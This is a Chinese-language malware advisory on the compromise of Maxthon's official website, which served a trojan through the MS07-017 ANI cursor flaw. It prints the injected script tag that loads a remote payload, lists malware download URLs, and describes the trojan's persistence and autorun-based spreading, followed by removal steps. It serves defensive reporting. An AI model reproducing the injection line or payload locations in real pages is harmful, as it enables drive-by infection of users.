遨游浏览器官方网站挂马分析(图)_安全中国

一、事件分析：
　　        昨天，DSW Lab Avert小组监测到国内知名浏览器傲游(maxthon.com)官方页面被挂木马.被挂马的页面为
　　    http://gocn.maxthon.com/m2/welcome/?ver=2.0.2.2961&lan=0x0804&lc=86&pn=max2&mid=000feacd52de，网站上其他页面
　　    没有被挂马，现在木马已经被清除。
　　        挂马采用了常见的js脚本，当用户浏览遨游网站的挂马网页时就会出发连接。被挂马页面截图：

　　        在该被引用的链接中，嵌入了<script src=http://kiss.***.com/dir/index_pic/1.js></script> 指令。当用户使用
　　    有漏洞的浏览器浏览该页面时，会自动执行该js脚本，通过MS07-017ANI光标漏洞来下载木马并运行。木马的网址为：
　　    http://kiss.***.com/dir/index_pic/dir.exe,此木马为Virus.Win32.AutoRun.au。另外在后台还会打开以下三个页面：
　　    http://sb.***.com/dir/index_pic/0614.js、http://sb.***.com/dir/index_pic/mm.html和
　　    http://sb.25u.com/dir/index_pic/tj.htm
　　        第一个页面：http://sb.***.com/dir/index_pic/0614.js，这是一个挂马的页面，当用户使用有漏洞的浏览器时，会
　　    自动到到以下地址下载木马并运行：http://sb.***.com/dir/index_pic/1.pif（此木马与前面提到的dir.exe相同）。
　　        第二个页面：http://sb.***.com/dir/index_pic/mm.html，未知。
　　        第三个页面：http://sb.***.com/dir/index_pic/tj.htm，它使用了51Yes网站流量统计来统计受害用户数量。

　　二、病毒分析：
　　      1、病毒描述：
　　　      　　病毒是由http://kiss.***.com/dir/index_pic/dir.exe下载来的的木马，与
　　    　　 http://sb.***.com/dir/index_pic/1.pif所下木马相同。病毒运行后拷贝自身到系统目录并注册一个服务以便开机自
　　   　　启动。连接网络下载木马并运行。该病毒由于并不完善，重启后会导致用户蓝屏，极为恶劣。
　　      2、病毒标签：
　　　　      　病毒名称：Virus.Win32.AutoRun.au
　　　　      　病毒别名：无
　　　　      　病毒类型：病毒
　　　　　      危害级别：5
　　　　　      感染平台：Windows
　　　　　      病毒大小：16,613 (字节)
　　　　　      SHA1　　：f36a8b7b1cdb934948b5500e9261f3389071bddd
　　　　      　加壳类型：Upack
　　　　      　开发工具：Delphi
　　      3、病毒行为：
　　　　　      (1) 病毒运行后会生成以下文件：
　　　　　　　      %windir%\system32\servet.exe
　　　　　      (2) 添加一个服务以便开机动运行：
　　　　　　　      服务名：Windows_SystemDown
　　　　　　　      描述：Windows_SystemDown
　　　　　　　      执行文件路径：%windir%\system32\servet.exe
　　　　　      (3) 连接以下网址下载木马并运行：
　　　　　　　      /pic/3/a2007-10-20-580ma1.jpg
　　　　　　　      /pic/3/a2007-10-20-621ma2.jpg
　　　　　　　      /pic/3/a2007-10-20-360ma3.jpg
　　　　　　　      以上地址的文件均为同一个可执行文件。木马运行后释放以下文件：
　　　　　　　      %windir%\system32\Drivers\usbinte.sys
　　　　　　　      %windir%\system32\visin.exe 　　
　　　　　      (4) 如果电脑的自动运行为关闭的话，病毒将通过修改注册表来打开自动运行功能。
　　　　　      (5) 试图感染局域网内的其他机器。感染方法为在局域网电脑共享的盘根目录下写入autorun.inf和setup.exe文件
　　　　　      (6) 感染插入到电脑的U盘，向其中写入autorun.inf和setup.exe文件。
　　      4、解决方案：
　　　　　      (1)删除服务：由于病毒会导致开机的时候蓝屏重启，所以要按F8进入安全模式，打开超级巡警，点高级，选择服务
　　　　　　　     管理，然后删除Windows_SystemDown服务既可。
　　　　　      (2)删除以下病毒文件：
　　　　　　　     %windir%\system32\servet.exe
　　　　　　　     %windir%\system32\Drivers\usbinte.sys
　　　　　　　     %windir%\system32\visin.exe 　
　　      5、安全建议：
　　　　　      (1)推荐安装超级巡警监测查杀以上木马。
　　　　　      (2)请广大用户及时升级系统补丁，预防更多的IE漏洞攻击。　
　　　　　      (3)不要随便共享文件或文件夹，即使要使用共享，应先设置好权限，另外不建议设置可写或可控制。
　　　　　      (4)使用移动存储介质进行数据访问时，先对其进行病毒检查，建议使用超级巡警U盘免疫器进行免疫。